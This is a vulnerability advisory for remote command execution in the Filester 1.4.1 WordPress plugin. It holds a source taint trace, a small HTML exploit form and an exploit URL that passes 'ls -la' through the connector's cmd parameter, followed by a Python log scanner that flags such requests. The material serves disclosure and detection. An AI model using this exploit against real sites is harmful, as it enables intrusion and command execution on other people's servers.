Filester V1.4.1 - Remote Command Execution

2020.10.29
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[-] Title    : Filester V1.4.1 - Remote Command Execution
[-] Author   : Milad Karimi
[-] Vendor   : https://wordpress.org/plugins/filester
[-] Category : Webapps
[-] Date     : 2020-10-27

Vulnerable Page: /elFinderConnector.class.php

Vulnerable Source (taint trace from request input to the exec call; the numbers are the connector's source lines):

160: exec elFinder->exec($cmd, $args)
108: $cmd = $src['cmd'] : '';
 93: $src[$key][] = rawurldecode($value);
     // if((!$src || $maxInputVars) && $rawPostData = file_get_contents('php://input')), if(!$src || $maxInputVars < count($parts)), if(preg_match('/^(.+?)\[([^\[\]]*)\]$/', $key, $m)), if($idx) else
 82: list($key, $value) = array_pad(explode('=', $part), 2, '');
     // list() if((!$src || $maxInputVars) && $rawPostData = file_get_contents('php://input')), if(!$src || $maxInputVars < count($parts))
 81: foreach($parts as $part)
     // if((!$src || $maxInputVars) && $rawPostData = file_get_contents('php://input')), if(!$src || $maxInputVars < count($parts))
 78: $parts = explode('&', $rawPostData);
     // if((!$src || $maxInputVars) && $rawPostData = file_get_contents('php://input'))
 76: $rawPostData = file_get_contents('php://input')){
     // trace stopped
 80: $src = array();
     // if((!$src || $maxInputVars) && $rawPostData = file_get_contents('php://input')), if(!$src || $maxInputVars < count($parts))
 74: $src = array_merge($_GET, $_POST) : $_GET;

requires:
 71: ⇓ function run()

Exploit Code:

<html>
<form action="http://localhost/includes/File_manager/lib/php/elFinderConnector.class.php" method="GET">
<input name="cmd" type="text">
<input type="submit" value="RCE!">
</form>
</html>

Exploit URL:
http://localhost/includes/File_manager/lib/php/elFinderConnector.class.php?cmd=ls -la
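The trace above ends at elFinder->exec($cmd, $args) with $cmd taken straight from the request: the connector splits the raw query or body on '&' and '=', rawurldecodes each value, folds foo[] / foo[k] keys into arrays, and then dispatches on $src['cmd']. What follows is an added, defender-side example written for this page; it is not part of the advisory and not Filester's or elFinder's code. It re-implements that parsing step in Python so the extracted cmd value is the same one the connector would see, then runs it over constructed web-server access-log lines and flags requests to elFinderConnector.class.php whose cmd value is not a plain elFinder command name (the advisory's own example URL carries a space and a dash, which no connector command name has). The log lines, client addresses and the command allowlist (assumed from elFinder's documented command set, not from this page) are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (invented for this example, not taken
# from the advisory). The request path is the vulnerable page it names.
SAMPLE_LOG = """\
203.0.113.5 - - [29/Oct/2020:10:00:01 +0000] "GET /includes/File_manager/lib/php/elFinderConnector.class.php?cmd=open&target=l1_Lw HTTP/1.1" 200 512
203.0.113.7 - - [29/Oct/2020:10:00:02 +0000] "GET /includes/File_manager/lib/php/elFinderConnector.class.php?cmd=ls%20-la HTTP/1.1" 200 88
203.0.113.9 - - [29/Oct/2020:10:00:03 +0000] "GET /wp-login.php HTTP/1.1" 200 3000
203.0.113.8 - - [29/Oct/2020:10:00:04 +0000] "POST /includes/File_manager/lib/php/elFinderConnector.class.php HTTP/1.1" 200 77
"""

# Assumption: elFinder's documented connector command names. Anything else
# reaching elFinder->exec($cmd, ...) is either a client bug or probing.
ELFINDER_COMMANDS = frozenset("""
open ls tree parents tmb file size mkdir mkfile rm rename duplicate paste
upload get put archive extract search info dim resize netmount url callback
chmod abort zipdl subdirs editor
""".split())

# Same key pattern the traced connector code uses to detect foo[] / foo[k] keys.
KEY_RE = re.compile(r'^(.+?)\[([^\[\]]*)\]$')

# Request field of a common/combined-format log line: method, path, optional query.
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+?)(?:\?(?P<query>\S*))? HTTP/')


def parse_connector_params(raw):
    """Split a raw query/body string the way the trace shows the connector
    doing it: explode on '&', then on '=', rawurldecode the value, and
    turn foo[]=v / foo[k]=v into a list / dict stored under 'foo'."""
    src = {}
    for part in raw.split('&'):
        if not part:
            continue
        key, _, value = part.partition('=')
        value = unquote(value)          # rawurldecode: '+' is NOT a space
        m = KEY_RE.match(key)
        if not m:
            src[key] = value
            continue
        base, idx = m.group(1), m.group(2)
        if idx:
            src.setdefault(base, {})
            if isinstance(src[base], dict):
                src[base][idx] = value
        else:
            src.setdefault(base, [])
            if isinstance(src[base], list):
                src[base].append(value)
    return src


def classify_cmd(cmd):
    """'known' for a documented command, 'unknown-name' for a bare word that
    is not one, 'suspicious' for a value carrying spaces or metacharacters,
    'no-cmd' when the request carried no usable cmd parameter at all."""
    if not cmd:
        return 'no-cmd'
    if cmd in ELFINDER_COMMANDS:
        return 'known'
    if re.fullmatch(r'[A-Za-z0-9_]+', cmd):
        return 'unknown-name'
    return 'suspicious'


def scan_access_log(text):
    """Return (method, cmd, verdict) for every request to the connector page."""
    findings = []
    for line in text.splitlines():
        m = REQ_RE.search(line)
        if not m or not m.group('path').endswith('elFinderConnector.class.php'):
            continue
        params = parse_connector_params(m.group('query') or '')
        cmd = params.get('cmd')
        if not isinstance(cmd, str):    # cmd[]=... or absent
            cmd = None
        findings.append((m.group('method'), cmd, classify_cmd(cmd)))
    return findings


if __name__ == '__main__':
    for method, cmd, verdict in scan_access_log(SAMPLE_LOG):
        print(f'{verdict:13} {method:4} cmd={cmd!r}')
```

The POST request in the sample is reported as 'no-cmd' because a standard access log does not record the request body; the php://input branch in the trace means the same parameter can arrive there, so body-level coverage needs a WAF or request-body logging in front of the connector, and the verdict for that path is not derivable from the access log alone.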


Copyright 2024, cxsecurity.com